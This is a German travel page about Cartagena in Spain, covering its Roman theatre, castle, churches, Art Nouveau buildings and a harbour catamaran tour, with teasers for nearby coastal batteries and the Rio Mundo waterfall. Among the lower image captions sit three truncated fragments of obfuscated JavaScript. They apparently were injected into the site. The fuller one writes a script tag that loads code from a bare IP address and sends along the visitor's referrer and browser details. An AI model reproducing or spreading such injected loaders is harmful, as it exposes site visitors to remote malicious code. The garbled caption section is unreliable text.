Cartagena Städtereisen und Fotos

1846
Cartagena Spanien

Cartagena in Spanien

Cartagena ist ideal, um seine Städtereise durch Spanien genau hier zu beginnen. Denn die beeindruckende Stadt mit seinem schönen Hafen blickt auf eine Geschichte von etwa 2.500 Jahren zurück. Dieses wird dem Besucher in allen Gassen, Straßen und auf vielen Plätzen durch bemerkenswerte Denkmäler deutlich, welche von einer glanzvollen, historischen Vergangenheit berichten. Die Stadt wirkt wohlhabend, ist sehr gepflegt und hat einen ganz besonderen Charme. Wer einmal hier war, wird dies sofort spüren. Es wurde in den letzten Jahren sehr viel restauriert und renoviert, so dass die Innenstadt in frischem Glanz erstrahlt. Cartagena bietet ein großes Angebot, das dem Besucher erlaubt, dass historische Erbe und den kulturellen Reichtum dieser Stadt zu bewundern. Cartagena liegt im Südosten von Spanien an der Costa Calida (heiße Küste). Die Stadt ist das ganze Jahr über ein beliebtes Reiseziel, denn selbst im Januar sind hier Tagestemperaturen von 20 Grad und mehr absolut keine Seltenheit.

Stadt CartagenaZu den bedeutendsten Sehenswürdigkeiten dieser Stadt gehört eindeutig das römische Theater, es verweist auf die römische Epoche dieser Stadt. Wie der Name schon sagt, waren hier erst die Karthager ansässig, dann natürlich auch viele Jahrhunderte lang, die Araber. Bei einem Spaziergang durch die Stadt entdeckt man Spuren der Kriegsmacht, die bis ins Mittelalter zurückführen, als die Burg de la Concepción gebaut wurde. Hier befindet sich heute, aufgrund der günstigen Lage, ein Ausstellungszentrum, das Informationen über die Stadt und ihre Geschichte anbietet. Vom Burggelände aus, haben Sie einen fantastischen Blick auf die Stadt. Von der Burg selber ist leider nicht mehr sehr viel erhalten geblieben. Weitere Zeugnisse für die militärische Bedeutung von Cartagena finden Sie bei dem Seewall, dem Militärhafen, dem Park der Artillerie, dem Militärkrankenhaus oder der Schule für die Seewache. Die vielen Burgen wie die Galeras, Atalaya und San Julián, die man vom Hafen aus sehen kann, dienten einst zusammen mit den zahlreichen Küstenwachen zur Verteidigung der Stadt. Das alte Militärkrankenhaus ist heute der Sitz der Polytechnischen Universität von Cartagena.

Hafenstadt Cartagena in SpanienNeben der militärischen Geschichte sind die Kirchen im barocken Stil mit Gemälden und Skulpturen von beachtlicher Qualität, absolut bewundernswert. Wie zum Beispiel die Kirche del Carmen, San Diego oder Santo Domingo und besonders die de la Caridad, in der sich Kunstwerke aus dem 18. und 19. Jahrhundert befinden. Auch die Schutzherrin der Stadt, die Jungfrau de la Caridad können Sie hier bewundern. Zu den schönsten Gebäuden in Cartagena gehören zweifelsohne das Rathaus und das Gran Hotel (aus dem Jahr 1916). Vom Rathausplatz aus gelangen Sie in die Fußgängerzone. Hier finden Sie sowohl gemütliche Straßenkaffees und Bars sowie viele Geschäfte und Boutique, die zum Bummeln einladen.

Weitere Sehenswürdigkeiten sind wunderschöne Gebäude mit aufwendiger Architektur im Jugendstil wie das Haus Cervantes und das Haus Maestre, der Palast Aguirre sowie das Haus Clares und andere Gebäude wie zum Beispiel der Gemeinderatspalast oder der Bahnhof. Dies sind Zeugnisse für die städtebauliche Entwicklung dieser Stadt, die sie aufgrund ihrer reichen Bodenschätze in den Bergen erlebte. Die Erfindung des Unterseeboots von Isaac Peral, welches am 8. September 1888 in Cádiz vom Stapel gelassen wurde, ist der vielleicht berühmteste Augenblick dieser Stadt und gilt dadurch fast als Wahrzeichen der Stadt.

Empfehlenswert bei einer Städtereise nach Cartagena ist der Aufzug an der Burg de la Concepción mit Rundblick, er verbindet den Hafen mit der Burg. Eine schöne Attraktion für die ganze Familie ist eine Fahrt mit einem Katamaran. Diese gibt es schon ab 8,- Euro pro Person und dauert etwa 45 Minuten. Von der Wasserseite aus hat man einen wunderschönen Blick auf die Stadt Cartagena. Der Katamaran legt direkt am Hafen ab und wieder an. Man sollte mit der Stadtbesichtigung vom Hafen ausgehend beginnen. Wenn man vom Hafen aus in die Altstadt kommt, taucht zunächst das Rathaus auf, ein Schmuckstück im Jugendstil mit einer majestätischen Marmortreppe. Durch die Cañón Straße gelangt man zu allen anderen Sehenswürdigkeiten, Restaurants und Boutiquen.

Ausflugsziele und Städtereisen

Festungsanlage in Cartagena

Abwehranlagen Bateria de Conejos und Bateria Aguilones in Cartagena

Rund um Cartagena befinden sich unterschiedliche Festungsanlagen und Geschütztürme am Meer, um die Stadt zu...
Bateria de Conejos in Cartagena

Batería de Aguilones in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("<7 8='2' 9='a' b='c/2' d='e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|ysiry||97|script|language|rel|nofollow|type|text|src|http|45|67|write|kdisy|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
Bateria de Conejos in Cartagena

Batería de Conejos in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|kdkfi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|akkit|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
video

Wunderschöner Wasserfall Rio Mundo in Riopar bei Albacete

Der imposante Wasserfall in Riopar bei Albacete, liegt fast 2,5 Stunden von Torrevieja entfernt, doch...
Nacimiento Rio Mundo in Riopar

Großer Wasserfall bei Albacete in Riopar Nacimiento Rio Mundo

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|eenek||97|script|language|rel|nofollow|type|text|src|http|45|67|write|frrfh|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Wow, was für ein toller Wasserfall! Wir staunten in Riopar nicht...